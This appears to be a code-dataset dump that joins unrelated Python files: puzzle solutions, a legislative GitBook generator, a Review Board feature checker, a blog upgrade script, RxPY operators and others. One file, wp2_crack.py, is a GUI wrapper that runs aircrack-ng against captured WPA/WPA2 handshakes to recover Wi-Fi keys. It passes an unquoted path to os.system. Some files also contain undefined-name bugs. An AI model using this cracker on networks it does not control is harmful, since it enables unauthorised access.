results = game_instance.start()
print results
if results[0] < results[1]:
print "Player A"
elif results[0] == results[1]:
print "Draw"
else:
print "Player B"
if __name__ == "__main__":
play() | apache-2.0 | -1,805,987,851,468,064,500 | 29.043478 | 105 | 0.673425 | false | 3.015284 | false | false | false |
Legilibre/SedLex | sedlex/CreateGitBookVisitor.py | 1 | 16946 | # -*- coding: utf-8 -*-
from duralex.AbstractVisitor import AbstractVisitor
from .AddCommitMessageVisitor import int_to_roman
from . import template
from . import diff
from duralex.alinea_parser import *
import duralex.tree as tree
from bs4 import BeautifulSoup
import jinja2
import os
import subprocess
import tempfile
from distutils.dir_util import copy_tree
class CreateGitBookVisitor(AbstractVisitor):
def __init__(self, args):
self.gitbook_dir = args.gitbook
self.tmp_dir = tempfile.mkdtemp()
self.formats = args.gitbook_format
super(CreateGitBookVisitor, self).__init__()
def write_file(self, filename, data):
f = open(self.tmp_dir + '/' + filename, 'w')
f.write(data.encode('utf-8'))
f.close()
def get_article_commit_title(self, node):
ancestors = get_node_ancestors(node)
messages = []
for ancestor in ancestors:
if 'type' not in ancestor:
continue;
if ancestor['type'] == tree.TYPE_BILL_ARTICLE:
messages.append('Article ' + str(ancestor['order']))
elif ancestor['type'] == tree.TYPE_AMENDMENT:
messages.append('Amendement ' + str(ancestor['id']))
elif ancestor['type'] == tree.TYPE_HEADER1:
messages.append(int_to_roman(ancestor['order']))
elif ancestor['type'] == tree.TYPE_HEADER2:
messages.append(unicode(ancestor['order']) + u'°')
elif ancestor['type'] == tree.TYPE_HEADER3:
messages.append(unicode(chr(ord('a') + ancestor['order'])) + u')')
return ', '.join(messages[::-1])
def get_article_commit_diff(self, edit, target_title, target_href):
if 'htmlDiff' in edit:
soup = BeautifulSoup(edit['htmlDiff'], "html5lib")
filename_div = soup.find('div', {'class': 'diff-filename'})
a_tag = soup.new_tag('a', href=target_href)
a_tag.string = target_title
filename_div.string = ''
filename_div.append(a_tag)
return unicode(soup.body.div)
elif 'diff' in edit:
process = subprocess.Popen(
'diff2html -i stdin -d word -o stdout --su hidden -s line',
shell=True,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.PIPE
)
out, err = process.communicate(input=edit['diff'].encode('utf-8') + '\n')
soup = BeautifulSoup(out, "html5lib")
return (str(list(soup.find_all('style'))[0]) + '\n\n'
+ unicode(soup.find('div', {'id': 'diff'})))
def get_commits(self, node):
edit_nodes = filter_nodes(node, lambda n: 'type' in n and n['type'] == tree.TYPE_EDIT)
commits = []
for edit_node in edit_nodes:
article_refs = filter_nodes(edit_node, lambda n: n['type'] == tree.TYPE_ARTICLE_REFERENCE)
# FIXME: amendment that targets a bill article and not a law/code article
if len(article_refs) == 0:
continue
article_ref = article_refs[0]
target_title, target_href = self.get_deep_link(self.get_edit_target_nodes(article_ref))
commits.append({
'title': self.get_article_commit_title(edit_node),
# remove the " ({reference list})" from the commit message since its already printed
# in the header above
'description': re.sub(r' \(.*\)', '', edit_node['commitMessage'].splitlines()[0]) if 'commitMessage' in edit_node else None,
'diff': self.get_article_commit_diff(edit_node, target_title, target_href),
'target': {
'title': target_title,
'link': target_href
}
})
return commits
def get_articles(self, node):
articles = []
article_nodes = filter_nodes(node, lambda n: n['type'] == tree.TYPE_BILL_ARTICLE)
for article_node in article_nodes:
articles.append({
'order': article_node['order'],
'content': article_node['content'],
'commits': self.get_commits(article_node),
'githubIssue': article_node['githubIssue'] if 'githubIssue' in article_node else None,
'gitlabIssue': article_node['gitlabIssue'] if 'gitlabIssue' in article_node else None
})
return articles
def get_amendments(self, node):
amendments = []
amendment_nodes = filter_nodes(node, lambda n: n['type'] == tree.TYPE_AMENDMENT)
for amendment_node in amendment_nodes:
amendments.append({
'id': amendment_node['id'],
'content': amendment_node['content'],
'commits': self.get_commits(amendment_node),
'signatories': amendment_node['signatories'],
'description': amendment_node['description'],
})
return amendments
def merge_dicts(self, *dict_args):
"""
Given any number of dicts, shallow copy and merge into a new dict,
precedence goes to key value pairs in latter dicts.
"""
result = {}
for dictionary in dict_args:
result.update(dictionary)
return result
def visit_node(self, node):
super(CreateGitBookVisitor, self).visit_node(node)
if tree.is_root(node):
edits = self.build_edit_matrix(node)
articles = self.get_articles(node)
amendments = self.get_amendments(node)
modified_texts = self.get_modified_texts(edits)
template_data = {
'title': self.get_book_title(node),
'url': node['url'],
'type': node['type'],
'description': node['description'],
'modified': modified_texts,
'articles': articles,
'amendments': amendments,
'tree': node,
}
if 'cocoricoVote' in node:
template_data['cocorico_vote'] = node['cocoricoVote']
template.template_file(
'gitbook/book.json.j2',
template_data,
os.path.join(self.tmp_dir, 'book.json')
)
template.template_file(
'gitbook/styles/website.css.j2',
template_data,
os.path.join(self.tmp_dir, 'styles/website.css')
)
template.template_file(
'gitbook/SUMMARY.md.j2',
template_data,
os.path.join(self.tmp_dir, 'SUMMARY.md')
)
template.template_file(
'gitbook/README.md.j2',
template_data,
os.path.join(self.tmp_dir, 'README.md')
)
current_article = 0
for article in articles:
template.template_file(
'gitbook/article.md.j2',
self.merge_dicts(template_data, {'current_article': current_article}),
os.path.join(self.tmp_dir, 'article-' + str(article['order']) + '.md')
)
current_article += 1
current_amendment = 0
for amendment in amendments:
template.template_file(
'gitbook/amendment.md.j2',
self.merge_dicts(template_data, {'current_amendment': current_amendment}),
os.path.join(self.tmp_dir, 'amendment-' + str(amendment['id']) + '.md')
)
current_amendment += 1
current_article = 0
current_law = 0
for modified in modified_texts:
template.template_file(
'gitbook/law.md.j2',
self.merge_dicts(template_data, {
'current_law': current_law,
}),
os.path.join(self.tmp_dir, modified['law'] + '.md')
)
for article in modified['articles']:
template.template_file(
'gitbook/text.md.j2',
self.merge_dicts(template_data, {
'current_law': current_law,
'current_article': current_article
}),
os.path.join(self.tmp_dir, modified['law'] + '-' + article['id'] + '.md')
)
current_article += 1
current_law += 1
if 'html' in self.formats:
self.cmd('gitbook install')
self.cmd('gitbook build')
if 'markdown' in self.formats:
copy_tree(self.tmp_dir, self.gitbook_dir)
else:
copy_tree(os.path.join(self.tmp_dir, '_book'), self.gitbook_dir)
else:
copy_tree(self.tmp_dir, self.gitbook_dir)
def cmd(self, command):
process = subprocess.Popen(
command,
cwd=self.tmp_dir,
shell=True,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.PIPE
)
return process.communicate()
def get_book_title(self, root_node):
title = ''
if root_node['type'] == tree.TYPE_LAW_PROJECT:
title = 'Projet De Loi'
elif root_node['type'] == tree.TYPE_LAW_PROPOSAL:
title = 'Proposition De Loi'
if 'id' in root_node:
title += u' N°' + str(root_node['id'])
if 'legislature' in root_node:
title += ', ' + str(root_node['legislature']) + u'ème législature'
return title
def patch(self, original, unified_diff):
fd, filename = input_file = tempfile.mkstemp()
os.write(fd, original.encode('utf-8'))
process = subprocess.Popen(
'patch -r - -p0 --output=- ' + filename,
shell=True,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.PIPE
)
out, err = process.communicate(input=unified_diff.encode('utf-8') + '\n')
return ''.join(out).decode('utf-8')
def get_deep_link(self, nodes):
href = []
title = []
for node in nodes:
if node['type'] == tree.TYPE_LAW_REFERENCE:
title.append(u'Loi N°' + node['id'])
href.append(node['id'])
elif node['type'] == tree.TYPE_BILL_ARTICLE:
title.append(u'Article ' + str(node['order']))
href.append(u'article-' + str(node['order']) + '.md#article-' + str(node['order']))
elif node['type'] == tree.TYPE_AMENDMENT:
title.append(u'Amendment ' + node['id'])
href.append(u'amendment-' + node['id'] + '.md#amendment-' + node['id'])
elif node['type'] == tree.TYPE_ARTICLE_REFERENCE:
title.append(u'Article ' + node['id'])
href.append(node['id'] + '.md')
elif node['type'] == tree.TYPE_HEADER1:
title.append(int_to_roman(node['order']))
href.append(int_to_roman(node['order']))
elif node['type'] == tree.TYPE_HEADER2:
title.append(unicode(node['order']) + u'°')
href.append(str(node['order']) + u'°')
elif ancestor['type'] == tree.TYPE_HEADER3:
title.append(unicode(chr(ord('a') + ancestor['order'])) + u')')
href.append(unicode(chr(ord('a') + ancestor['order'])) + u')')
return (', '.join(title), '-'.join(href))
def get_edit_target_nodes(self, node):
nodes = []
if tree.is_reference(node):
nodes.append(node)
nodes += filter(
lambda n: tree.is_reference(n),
get_node_ancestors(node)
)
return sorted(
nodes,
key=lambda n: tree.TYPE_REFERENCE.index(n['type'])
)
def get_edit_source_nodes(self, node):
edit_source_types = [
tree.TYPE_AMENDMENT,
tree.TYPE_BILL_ARTICLE,
tree.TYPE_HEADER1,
tree.TYPE_HEADER2,
tree.TYPE_HEADER3,
]
return sorted(
filter(
lambda n: 'type' in n and n['type'] in edit_source_types,
get_node_ancestors(node)
),
key=lambda n: edit_source_types.index(n['type'])
)
def get_original_content(self, ref):
if ref['type'] == tree.TYPE_BILL_ARTICLE_REFERENCE:
bill_article = tree.filter_nodes(
tree.get_root(ref),
lambda n: n['type'] == tree.TYPE_BILL_ARTICLE and n['order'] == ref['order']
)
if len(bill_article) == 1:
return bill_article[0]['content']
elif ref['type'] == tree.TYPE_ARTICLE_REFERENCE:
f = open(ref['filename'], 'r')
text = f.read().decode('utf-8')
f.close()
return text
def get_modified_texts(self, edits):
modified = []
edits = edits[tree.TYPE_BILL_ARTICLE]
law_ids = set([i[0] for i in edits.keys()])
for law_id in law_ids:
law_edits = {k: v for k, v in edits.iteritems() if k[0] == law_id}
articles = []
for k, v in edits.iteritems():
law_ref = filter_nodes(v[0][-1], lambda n: n['type'] in [tree.TYPE_LAW_REFERENCE, tree.TYPE_CODE_REFERENCE] and n['id'] == k[0])[0]
article_ref = filter_nodes(law_ref, lambda n: n['type'] == tree.TYPE_ARTICLE_REFERENCE and n['id'] == k[1])[0]
original_text = self.get_original_content(article_ref)
text = original_text
commits = []
for edit_source in v:
title, href = self.get_deep_link(edit_source)
commits.append({'title': title, 'link': href})
edit_refs = filter_nodes(edit_source[-1], lambda n: n['type'] == tree.TYPE_EDIT)
for edit_ref in edit_refs:
if 'diff' in edit_ref:
text = self.patch(text, edit_ref['diff'])
article = {
'id': k[1],
'diff': diff.make_html_rich_diff(original_text, text),
'commits': commits
}
if 'gitlabHistory' in article_ref:
article['gitlabHistory'] = article_ref['gitlabHistory']
if 'githubHistory' in article_ref:
article['githubHistory'] = article_ref['githubHistory']
articles.append(article)
articles = sorted(articles, key=lambda x: x['id'].replace('-', ' '))
modified.append({'law': law_id, 'articles': articles})
return modified
def build_edit_matrix(self, node):
edits = {
tree.TYPE_BILL_ARTICLE: {},
tree.TYPE_AMENDMENT: {},
}
# fetch bill articles targeting law articles
self.build_edit_matrix_for_types(
node,
edits[tree.TYPE_BILL_ARTICLE],
[tree.TYPE_BILL_ARTICLE],
[tree.TYPE_ARTICLE_REFERENCE],
[tree.TYPE_LAW_REFERENCE, tree.TYPE_CODE_REFERENCE]
)
self.build_edit_matrix_for_types(
node,
edits[tree.TYPE_AMENDMENT],
[tree.TYPE_AMENDMENT],
[tree.TYPE_ARTICLE_REFERENCE],
[tree.TYPE_LAW_REFERENCE, tree.TYPE_CODE_REFERENCE]
)
# fetch amendments targeting bill articles
# self.build_edit_matrix_for_types(
# node,
# edits,
# [tree.TYPE_AMENDMENT],
# [tree.TYPE_BILL_ARTICLE_REFERENCE],
# None
# )
return edits
def build_edit_matrix_for_types(self, node, edits, source_type, target_type, repo_types):
article_refs = []
sources = filter_nodes(
node,
lambda n: 'type' in n and n['type'] in source_type
)
for source in sources:
article_refs += filter_nodes(
source,
lambda n: 'type' in n and n['type'] in target_type
)
for article_ref in article_refs:
repo_refs = filter(
lambda n: 'type' in n and n['type'] in repo_types,
get_node_ancestors(article_ref)
)
if len(repo_refs) != 0:
key = (repo_refs[0]['id'], article_ref['id'])
if key not in edits:
edits[key] = []
edits[key].append(self.get_edit_source_nodes(article_ref))
| agpl-3.0 | -7,017,960,253,196,176,000 | 38.856471 | 147 | 0.512368 | false | 3.950326 | false | false | false |
chipx86/reviewboard | reviewboard/features/checkers.py | 2 | 4416 | """Review Board feature checkers."""
from __future__ import unicode_literals
from django.conf import settings
from djblets.features.checkers import SiteConfigFeatureChecker
class RBFeatureChecker(SiteConfigFeatureChecker):
"""Feature checker that checks against a LocalSite's configuration.
Features can be enabled/disabled on a per-LocalSite basis by setting
the specified feature ID to either ``True`` or ``False`` in the
``enabled_features`` key in that LocalSite's
:py:attr:`~reviewboard.sites.models.LocalSite.extra_data`` field.
If the key is absent, this checker will check against the site
configuration (and then the Django settings) to see if it is enabled or
disabled globally.
"""
EXTRA_DATA_KEY = SiteConfigFeatureChecker.siteconfig_key
def is_feature_enabled(self, feature_id, **kwargs):
"""Return whether a feature is enabled for a given ID.
Features are strictly additive. That is, if a feature is enabled
globally (e.g., via
:py:class:`~djblets.siteconfig.models.SiteConfiguration` or via
:file:`settings_local.py`), disabling it for a
:py:class:`~reviewboard.site.models.LocalSite` will still result in the
feature being available (i.e., this function will return ``True``).
Args:
feature_id (unicode):
The unique identifier of the feature whose status is to be
determined.
**kwargs (dict):
Additional keyword arguments.
Keyword Args:
request (django.http.HttpRequest, optional):
An optional request. If this request is made against a
LocalSite, that LocalSite will be used to look up the feature.
Either this argument or ``local_site`` must be provided to
enable checking against a LocalSite.
If provided, it will be used to cache the results of the
:py:class:`~reviewboard.site.models.LocalSite` lookup.
local_site (reviewboard.site.models.LocalSite, optional):
An optional local site. If provided, this LocalSite will be
used to look up the status of the requested feature.
Either this argument or ``request`` must be provided to enable
checking against a LocalSite.
force_check_user_local_sites (bool, optional):
Force checking the Local Sites that the user is a member of.
This is only used for unit tests, and disables some
optimizations intended to stabilize query counts.
Returns:
bool:
Whether or not the feature is enabled.
"""
local_site = kwargs.get('local_site')
request = kwargs.get('request')
force_check_user_local_sites = \
kwargs.get('force_check_user_local_sites', False)
local_sites = []
if local_site:
local_sites.append(local_site)
elif request is not None:
try:
local_sites = request._user_local_sites_cache
except AttributeError:
if getattr(request, 'local_site', None):
local_sites.append(request.local_site)
# Note that if we're running unit tests, we don't really want
# to bother checking other Local Site associations. They're not
# going to come into play unless we're testing this logic
# itself, and the generated number of queries becomes too
# unpredictable whenever we introduce new features that aren't
# enabled by default.
if (request.user.is_authenticated() and
(force_check_user_local_sites or
not getattr(settings, 'RUNNING_TEST', False))):
local_sites.extend(request.user.local_site.all())
request._user_local_sites_cache = local_sites
for local_site in local_sites:
if (local_site.extra_data and
local_site.extra_data.get(self.EXTRA_DATA_KEY,
{}).get(feature_id)):
return True
return super(RBFeatureChecker, self).is_feature_enabled(feature_id,
**kwargs)
| mit | -9,158,350,635,790,341,000 | 40.660377 | 79 | 0.603261 | false | 4.768898 | true | false | false |
lemming52/white_pawn | hackerrank/snakesladders/solution.py | 1 | 3998 | """
Markov takes out his Snakes and Ladders game, stares at the board and wonders: "If I can always roll the die to whatever number I want, what would be the least number of rolls to reach the destination?"
Rules The game is played with a cubic die of faces numbered to .
Starting from square , land on square with the exact roll of the die. If moving the number rolled would place the player beyond square , no move is made.
If a player lands at the base of a ladder, the player must climb the ladder. Ladders go up only.
If a player lands at the mouth of a snake, the player must go down the snake and come out through the tail. Snakes go down only.
Function Description
Complete the quickestWayUp function in the editor below. It should return an integer that represents the minimum number of moves required.
quickestWayUp has the following parameter(s):
ladders: a 2D integer array where each contains the start and end cell numbers of a ladder
snakes: a 2D integer array where each contains the start and end cell numbers of a snake
Input Format
The first line contains the number of tests, .
For each testcase:
- The first line contains , the number of ladders.
- Each of the next lines contains two space-separated integers, the start and end of a ladder.
- The next line contains the integer , the number of snakes.
- Each of the next lines contains two space-separated integers, the start and end of a snake.
Constraints
The board is always with squares numbered to .
Neither square nor square will be the starting point of a ladder or snake.
A square will have at most one endpoint from either a snake or a ladder.
Output Format
For each of the t test cases, print the least number of rolls to move from start to finish on a separate line. If there is no solution, print -1.
Sample Input
2
3
32 62
42 68
12 98
7
95 13
97 25
93 37
79 27
75 19
49 47
67 17
4
8 52
6 80
26 42
2 72
9
51 19
39 11
37 29
81 3
59 5
79 23
53 7
43 33
77 21
Sample Output
3
5
"""
#!/bin/python3
import math
import os
import random
import re
import sys
from collections import defaultdict
class Graph:
def __init__(self):
self.neighbours=defaultdict(list)
def add_edge(self,u,v,dist):
if dist >= 0:
self.neighbours[u].append([v, dist])
else:
self.neighbours[u] = [[v, 0]]
def add_node(self, a):
self.nodes[a] = []
def shortest_path(self):
queue = []
visited = {}
queue.append([0, 0])
while queue:
index, rolls = queue.pop(0)
if index in visited:
continue
visited[index] = rolls
if index == 99:
break
for neighbour in self.neighbours[index]:
if neighbour[0] not in visited:
queue.append([neighbour[0], rolls + neighbour[1]])
if 99 in visited:
return visited[99]
else:
return -1
# Complete the quickestWayUp function below.
def quickestWayUp(ladders, snakes):
g = Graph()
for i in range(99):
for j in range(1, 7):
g.add_edge(i, i + j, 1)
for ladder in ladders:
g.add_edge(ladder[0]-1, ladder[1]-1, 0)
for snake in snakes:
g.add_edge(snake[0]-1, snake[1]-1, 0)
return g.shortest_path()
if __name__ == '__main__':
fptr = sys.stdout
t = int(input())
for t_itr in range(t):
n = int(input())
ladders = []
for _ in range(n):
ladders.append(list(map(int, input().rstrip().split())))
m = int(input())
snakes = []
for _ in range(m):
snakes.append(list(map(int, input().rstrip().split())))
result = quickestWayUp(ladders, snakes)
fptr.write(str(result) + '\n')
fptr.close()
| mit | 7,320,411,094,006,963,000 | 22.230303 | 202 | 0.615808 | false | 3.485615 | false | false | false |
SilverBlogTeam/SilverBlog | upgrade/upgrade_from_1.py | 1 | 1367 | if __name__ == '__main__':
print("The upgrade script has changed. You need to execute the upgrade command again to update the data structure.")
exit(0)
import json
import os
import shutil
from common import file
def change_time_fomart(list_item):
import time
system_info = json.loads(file.read_file("./config/system.json"))
if "time" in list_item and isinstance(list_item["time"], str):
list_item["time"] = time.mktime(time.strptime(list_item["time"], system_info["Time_Format"]))
return list_item
def main():
if not os.path.exists("./backup"):
os.mkdir("./backup")
shutil.copytree("./config", "./backup/config")
shutil.copytree("./document", "./backup/document")
if os.path.exists("./templates/static/user_file"):
shutil.copytree("./templates/static/user_file", "./backup/static/user_file")
write_json = json.loads(file.read_file("./config/page.json"))
write_json = list(map(change_time_fomart, write_json))
file.write_file("./config/page.json", file.json_format_dump(write_json))
for filename in os.listdir("./document/"):
if filename.endswith(".json"):
write_json = json.loads(file.read_file("./document/" + filename))
write_json = change_time_fomart(write_json)
file.write_file("./document/" + filename, json_format_dump(write_json)) | bsd-3-clause | 6,423,764,364,611,883,000 | 39.235294 | 120 | 0.653987 | false | 3.645333 | false | false | false |
EthanAdner/Picture | picture.py | 1 | 1865 | """
picture.py
Author: Ethan Adner
Credit: Hex color codes
Assignment:
Use the ggame library to "paint" a graphical picture of something (e.g. a house, a face or landscape).
Use at least:
1. Three different Color objects.
2. Ten different Sprite objects.
3. One (or more) RectangleAsset objects.
4. One (or more) CircleAsset objects.
5. One (or more) EllipseAsset objects.
6. One (or more) PolygonAsset objects.
See:
https://github.com/HHS-IntroProgramming/Standards-and-Syllabus/wiki/Displaying-Graphics
for general information on how to use ggame.
See:
http://brythonserver.github.io/ggame/
for detailed information on ggame.
"""
from ggame import App, Color, LineStyle, Sprite, RectangleAsset, CircleAsset, EllipseAsset, PolygonAsset
# add your code here \/ \/ \/
red = Color(0xff0000, 1.0)
green = Color(0x00ff00, 1.0)
blue = Color(0x0000ff, 1.0)
black = Color(0x000000, 1.0)
orange = Color(0xff7400, 1.0)
beige = Color(0xffffd8, 1.0)
white = Color(0xffffff, 1.0)
noline = LineStyle(2 , black)
nlu = LineStyle(5 , blue)
thickline = LineStyle(5 , red)
thickline2 = LineStyle(5, orange)
circle = CircleAsset(10, noline, beige)
poly = PolygonAsset([(20,20), (30,40), (50,160), (20,100)], thickline, red)
portal1 = EllipseAsset(40, 10, nlu, white)
rectum = RectangleAsset(40, 60, thickline2, orange)
portal2 = EllipseAsset(40, 10, thickline2, white)
rectum2 = RectangleAsset(40, 30, thickline2, orange)
legs = RectangleAsset(5, 30, thickline2, orange)
#arm1 =
#arm2 =
arm1 = Sprite(legs, (130, 480))
arm2 = Sprite(legs, (30, 480))
arm1.rotation=-1
arm2.rotation=1
#arm1.roation=.5
Sprite(circle, (80, 478))
Sprite(poly, (90, 530))
Sprite(portal1, (80, 150))
Sprite(portal2, (80, 550))
Sprite(rectum, (60, 490))
Sprite(rectum2, (60, 150))
Sprite(legs, (60, 180))
Sprite(legs, (95, 180))
# add your code here /\ /\ /\
myapp = App()
myapp.run()
| mit | 2,853,899,190,494,927,000 | 23.866667 | 104 | 0.710456 | false | 2.590278 | false | false | false |
fre-sch/collector-drone | collectordrone/errors.py | 1 | 1289 | # Unofficial companion web-app for Elite: Dangerous (property of Frontier
# Developments). Collector-Drone lets you manage blueprints and material
# inventory for crafting engineer upgrades.
# Copyright (C) 2016 Frederik Schumacher
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
class ServiceError(Exception):
status_code = 400
def __init__(self, message, status_code=None, **payload):
super(ServiceError, self).__init__()
self.message = message
if status_code is not None:
self.status_code = status_code
self.payload = payload
def to_dict(self):
rv = dict(self.payload or ())
rv['message'] = self.message
return rv
| gpl-3.0 | -6,516,625,199,229,902,000 | 39.28125 | 73 | 0.71218 | false | 3.990712 | false | false | false |
liorvh/infernal-twin | wp2_crack.py | 9 | 5176 | import wx
import os, sys
class MyFrame(wx.Frame):
def __init__(self, parent, id, title):
wx.Frame.__init__(self, parent, id, title)
panel = wx.Panel(self,-1)
wx.StaticText(panel, -1, 'See Logs for results\ncaptures/key_found.txt', (45, 25), style=wx.ALIGN_CENTRE)
self.CreateStatusBar()
menuBar = wx.MenuBar()
menu = wx.Menu()
menu.Append(99, "&WPA2 Cracker", "Crack WPA/WPA2 handshakes")
#~ menu.Append(100, "&NTLM Cracker", "Crack NTLM Hashes")
#~ menu.Append(101, "&File Dialog", "Shows a File Dialog")
#~ menu.Append(102, "&Page Setup Dialog", "Shows a Page Setup Dialog")
#~ menu.Append(103, "&Font Dialog", "Shows a Font Dialog")
#~ menu.Append(104, "&Directory Dialog", "Shows a Directory Dialog")
#~ menu.Append(105, "&SingleChoice Dialog", "Shows a SingleChoice Dialog")
#~ menu.Append(106, "&TextEntry Dialog", "Shows a TextEntry Dialog")
menuBar.Append(menu, "&Cracker")
self.SetMenuBar(menuBar)
self.Bind(wx.EVT_MENU, self.openfile, id=99)
#dlg.Destroy()
#~ def results_output(self, e):
#~ with open('captures/key_found.txt') as f:
#~ for i in f:
#~
#~ if i == "":
#~
#~ wx.StaticText(panel, -1, "Key is not found: ", (45, 25), style=wx.ALIGN_CENTRE)
#~ self.Centre()
#~ else:
#~ wx.StaticText(panel, -1, "Key is found: " + str(i), (45, 25), style=wx.ALIGN_CENTRE)
#~ self.Centre()
#~ self.Bind(wx.EVT_MENU, self.choosecolor, id=100)
#~ self.Bind(wx.EVT_MENU, self.openfile, id=101)
#~ self.Bind(wx.EVT_MENU, self.pagesetup, id=102)
#~ self.Bind(wx.EVT_MENU, self.choosefont, id=103)
#~ self.Bind(wx.EVT_MENU, self.opendir, id=104)
#~ self.Bind(wx.EVT_MENU, self.singlechoice, id=105)
#~ self.Bind(wx.EVT_MENU, self.textentry, id=106)
#~ def message(self, event):
#~ dlg = wx.MessageDialog(self, 'To save one life is as if you have saved the world.', 'Talmud', wx.OK|wx.ICON_INFORMATION)
#~ dlg.ShowModal()
#~ dlg.Destroy()
#~ def choosecolor(self, event):
#~ dlg = wx.ColourDialog(self)
#~ dlg.GetColourData().SetChooseFull(True)
#~ if dlg.ShowModal() == wx.ID_OK:
#~ data = dlg.GetColourData()
#~ self.SetStatusText('You selected: %s\n' % str(data.GetColour().Get()))
#~ dlg.Destroy()
def openfile(self, event):
dlg = wx.FileDialog(self, "Choose a file", os.getcwd(), "", "*.*", wx.OPEN)
if dlg.ShowModal() == wx.ID_OK:
path = dlg.GetPath()
mypath = os.path.basename(path)
self.SetStatusText("You selected: %s" % mypath)
os.system("gnome-terminal -x aircrack-ng -w "+str(path)+" captures/*.cap -l captures/key_found.txt")
dlg.Destroy()
#~ def pagesetup(self, event):
#~ dlg = wx.PageSetupDialog(self)
#~ if dlg.ShowModal() == wx.ID_OK:
#~ data = dlg.GetPageSetupData()
#~ tl = data.GetMarginTopLeft()
#~ br = data.GetMarginBottomRight()
#~ self.SetStatusText('Margins are: %s %s' % (str(tl), str(br)))
#~ dlg.Destroy()
#~ def choosefont(self, event):
#~ default_font = wx.Font(10, wx.SWISS , wx.NORMAL, wx.NORMAL, False, "Verdana")
#~ data = wx.FontData()
#~ if sys.platform == 'win32':
#~ data.EnableEffects(True)
#~ data.SetAllowSymbols(False)
#~ data.SetInitialFont(default_font)
#~ data.SetRange(10, 30)
#~ dlg = wx.FontDialog(self, data)
#~ if dlg.ShowModal() == wx.ID_OK:
#~ data = dlg.GetFontData()
#~ font = data.GetChosenFont()
#~ color = data.GetColour()
#~ text = 'Face: %s, Size: %d, Color: %s' % (font.GetFaceName(), font.GetPointSize(), color.Get())
#~ self.SetStatusText(text)
#~ dlg.Destroy()
#~
#~ def opendir(self, event):
#~ dlg = wx.DirDialog(self, "Choose a directory:", style=wx.DD_DEFAULT_STYLE | wx.DD_NEW_DIR_BUTTON)
#~ if dlg.ShowModal() == wx.ID_OK:
#~ self.SetStatusText('You selected: %s\n' % dlg.GetPath())
#~ dlg.Destroy()
#~
#~ def singlechoice(self, event):
#~ sins = ['Greed', 'Lust', 'Gluttony', 'Pride', 'Sloth', 'Envy', 'Wrath']
#~ dlg = wx.SingleChoiceDialog(self, 'Seven deadly sins', 'Which one?', sins, wx.CHOICEDLG_STYLE)
#~ if dlg.ShowModal() == wx.ID_OK:
#~ self.SetStatusText('You chose: %s\n' % dlg.GetStringSelection())
#~ dlg.Destroy()
#~
#~ def textentry(self, event):
#~ dlg = wx.TextEntryDialog(self, 'Enter some text','Text Entry')
#~ dlg.SetValue("Default")
#~ if dlg.ShowModal() == wx.ID_OK:
#~ self.SetStatusText('You entered: %s\n' % dlg.GetValue())
#~ dlg.Destroy()
class MyApp(wx.App):
def OnInit(self):
myframe = MyFrame(None, -1, "Cracker")
myframe.CenterOnScreen()
myframe.Show(True)
return True
#~
| gpl-3.0 | 3,435,153,990,718,865,400 | 38.212121 | 131 | 0.553323 | false | 3.210918 | false | false | false |
hzdg/django-ecstatic | setup.py | 1 | 1619 | #/usr/bin/env python
import codecs
import os
from setuptools import setup, find_packages
read = lambda filepath: codecs.open(filepath, 'r', 'utf-8').read()
def exec_file(filepath, globalz=None, localz=None):
exec(read(filepath), globalz, localz)
# Load package meta from the pkgmeta module without loading the package.
pkgmeta = {}
exec_file(os.path.join(os.path.dirname(__file__), 'ecstatic', 'pkgmeta.py'),
pkgmeta)
setup(
name=pkgmeta['__title__'],
version=pkgmeta['__version__'],
description='An expansion pack for django.contrib.staticfiles!',
long_description=read(os.path.join(os.path.dirname(__file__), 'README.rst')),
author=pkgmeta['__author__'],
author_email='[email protected]',
url='http://github.com/hzdg/django-ecstatic',
download_url='http://github.com/hzdg/django-ecstatic/tarball/master',
packages=find_packages(),
zip_safe=False,
include_package_data=True,
tests_require=[
],
install_requires=[
'Django>=1.4',
'django-appconf>=0.5',
],
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2.5',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Topic :: Utilities'
],
)
| mit | 959,482,487,382,134,500 | 31.38 | 81 | 0.627548 | false | 3.730415 | false | false | false |
dbrattli/RxPY | rx/linq/observable/selectmany.py | 1 | 2647 | from rx import Observable
from rx.internal.utils import adapt_call
from rx.internal import extensionmethod
import collections
def _flat_map(source, selector):
def projection(x, i):
selector_result = selector(x, i)
if isinstance(selector_result, collections.Iterable):
result = Observable.from_(selector_result)
else:
result = Observable.from_future(selector_result)
return result
return source.map(projection).merge_observable()
@extensionmethod(Observable, alias="flat_map")
def select_many(self, selector, result_selector=None):
"""One of the Following:
Projects each element of an observable sequence to an observable
sequence and merges the resulting observable sequences into one
observable sequence.
1 - source.select_many(lambda x: Observable.range(0, x))
Or:
Projects each element of an observable sequence to an observable
sequence, invokes the result selector for the source element and each
of the corresponding inner sequence's elements, and merges the results
into one observable sequence.
1 - source.select_many(lambda x: Observable.range(0, x), lambda x, y: x + y)
Or:
Projects each element of the source observable sequence to the other
observable sequence and merges the resulting observable sequences into
one observable sequence.
1 - source.select_many(Observable.from_([1,2,3]))
Keyword arguments:
selector -- A transform function to apply to each element or an
observable sequence to project each element from the source
sequence onto.
result_selector -- [Optional] A transform function to apply to each
element of the intermediate sequence.
Returns an observable sequence whose elements are the result of
invoking the one-to-many transform function collectionSelector on each
element of the input sequence and then mapping each of those sequence
elements and their corresponding source element to a result element.
"""
if result_selector:
def projection(x, i):
selector_result = selector(x, i)
if isinstance(selector_result, collections.Iterable):
result = Observable.from_(selector_result)
else:
result = Observable.from_future(selector_result)
return result.map(lambda y: result_selector(x, y, i))
return self.flat_map(projection)
if callable(selector):
selector = adapt_call(selector)
ret = _flat_map(self, selector)
else:
ret = _flat_map(self, lambda _,__: selector)
return ret
